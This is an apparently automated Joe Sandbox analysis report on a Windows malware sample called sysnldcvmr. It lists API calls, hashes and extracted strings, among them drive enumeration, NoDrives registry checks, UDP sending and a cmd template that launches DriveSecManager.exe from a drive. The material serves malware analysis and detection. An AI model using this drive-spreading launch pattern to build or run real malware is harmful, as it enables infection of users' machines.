                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                    • Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                                                                                                                                                    • Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416478,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 442028454-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                                                                                                                                                                                                    • Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                                                                                                                                    • String ID: %s%s
                                                                                                                                                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                                                                                                                                                    • Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                                                                                                                                                    • Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                                                                                                                                                                                                    • NoDrives, xrefs: 00406418
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                                                                                                                                    • Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                                                                                                                                                    • Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                                                                                                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                                                                                                                                                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                                                                                                                                    • Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                                                                                                                                                    • Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3488799664-0
                                                                                                                                                                                                                                                    • Opcode ID: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                                                                                                                                                                                                    • Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                                                                                                                                    • Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                                                                                                                                                    • Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                                                                    • String ID: pdu
                                                                                                                                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                                                                                                                                    • Opcode ID: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                                                                                                                                                                                                    • Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040646B
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004064B6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
                                                                                                                                                                                                                                                    • %comspec%, xrefs: 004064BF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                                                                                                                                                                                                    • String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
                                                                                                                                                                                                                                                    • API String ID: 2038452267-3640840557
                                                                                                                                                                                                                                                    • Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                                                                                                                                                    • Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040D429
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040D458
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D467
                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0040D474
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 3102160386-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                                                                                                                                                                                                    • Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                                                                                                                                                      • Part of subcall function 0040A1B0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                                                                    • String ID: pdu$.ou
                                                                                                                                                                                                                                                    • API String ID: 309973729-2706015961
                                                                                                                                                                                                                                                    • Opcode ID: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                                                                                                                                                                                                    • Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                                                                                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3966618661-0
                                                                                                                                                                                                                                                    • Opcode ID: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                                                                                                                                                                                                    • Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _allshl
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 435966717-0
                                                                                                                                                                                                                                                    • Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                                                                                                                                                    • Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                                                                                                                                                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                                                                                                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                                                                                                                                                    • String ID: \??\
                                                                                                                                                                                                                                                    • API String ID: 1681518211-3047946824
                                                                                                                                                                                                                                                    • Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                                                                                                                                                    • Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,?), ref: 00407338
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00407361
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 2064604595-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
                                                                                                                                                                                                                                                    • Instruction ID: f93afe995e2a8aed0921a04be4342d20ba97acab7f8849ac526c8a5d2aa2879c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20F090B1A04308FBDB00DFA4EC46F9E7378BB48704F244468F908A73C1D675AA10CB59
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
